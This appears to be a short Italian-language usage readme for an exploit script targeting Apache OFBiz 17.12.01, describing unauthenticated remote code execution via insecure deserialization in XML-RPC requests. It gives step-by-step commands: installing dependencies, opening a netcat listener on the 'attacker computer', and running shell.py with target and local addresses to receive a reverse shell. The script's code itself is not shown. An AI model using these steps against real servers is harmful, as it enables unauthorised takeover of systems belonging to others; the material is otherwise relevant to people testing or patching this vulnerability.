
ApacheOfBiz 17.12.01 - Esecuzione remota di codice non autorizzata
ApacheOfBiz 17.12.01 - Esecuzione remota di codice non autorizzata
Le richieste XML-RPC sono vulnerabili a deserializzazione non sicura.
pip3 install -r requeriments.txt
nc -nlvp <port> # computer attaccante
python3 shell.py -i <remote IP> -p <remote port> -li <local IP> -lp <local port>
Dovresti avere una shell nel tuo listener nc
